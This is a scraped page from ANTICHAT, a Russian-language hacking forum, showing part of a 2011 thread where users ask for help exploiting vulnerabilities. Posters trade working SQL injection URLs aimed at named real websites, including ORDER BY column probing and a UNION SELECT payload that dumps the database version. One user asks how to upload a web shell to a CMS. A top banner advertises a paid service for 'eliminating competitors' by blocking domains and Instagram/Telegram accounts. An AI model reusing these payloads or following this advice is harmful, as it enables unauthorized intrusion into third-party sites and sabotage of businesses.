УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1644 из 2438

1644

Опции темы

Поиск в этой теме

Опции просмотра

#16431

23.02.2011, 08:04

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

а с чего ты взял что там уязвимость?

#16432

23.02.2011, 09:57

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

где в cms bitrix найти адрес сайта в бд и в какой таблице или php файле хранится? (наподобие как в жумла в configuration.php есть адрес сайта)

#16433

23.02.2011, 17:26

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

WebSite CMS v.2.01 кто знает как залить шелл в этой кмс?

#16434

23.02.2011, 20:57

asql

Guest

Сообщений: n/a

Провел на форуме:
8829

Репутация: -3

http://politec.ru/country.asp?id=2'

возможно ли обойти фильтрацию?

Яндекс тИЦ 1100

Яндекс Rank 5/6

так к слову....

#16435

23.02.2011, 21:34

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Мб поздно отвечаю, но раньше не мог...

Цитата:

Сообщение от foozzi

foozzi said:
нашол вот такую уязвимость
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'
как ее использовать?

После ордер бай

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,1-- 1

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,10-- 1

Цитата:

Сообщение от Фараон

Фараон said:
Как говорил
Dr.Z3r0

В данном примере фильтровать вообще ничего не нунжно, достаточно преобразовывать в целочисленное значение.

И да, тебе отдельный привет за слитие скуль из приватов других проэктов, ну ты понял.

Ну и как написал выше Redwood там был нарушен синтаксис=/

Цитата:

Сообщение от Redwood

Redwood said:
Эксплуатация:

Код HTML:

HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a

Зачем сортировать перебирая все колонки, если можно сразу указать максимальную?

#16436

23.02.2011, 21:35

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Цитата:

Сообщение от asql

asql said:
http://politec.ru/country.asp?id=2'
возможно ли обойти фильтрацию?
Яндекс тИЦ 1100
Яндекс Rank 5/6
так к слову....

Это не фильтрация, это ошибка в приведении типов данных

#16437

23.02.2011, 22:11

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28895

Репутация: 4

Ребят, первый раз с таким сталкиваюсь и не могу в пост запросе подобрать кол-во полей, все перепробовал пробелы на + /* %20 заменяю ничего понять не могу выдает

Код:

Code:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 2

Что делать?

#16438

23.02.2011, 22:16

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

это очень на insert похоже

#16439

23.02.2011, 22:17

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Помогите вывести версию БД.

http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+

#16440

23.02.2011, 22:23

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от FlaktW

FlaktW said:
Помогите вывести версию БД.
http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+

http://www.courthouseforum.com/forums/view.php?id=1060181'+and%20mid(version(),1,1)=5+--+

Вот еще нашел сскулю с выводом. В другом скрипте.

http://www.courthouseforum.com//forums/directory.php?type=judges&state=8617%20and%201!=1% 20union%20select%201,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22

Страница 1644 из 2438

1644

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход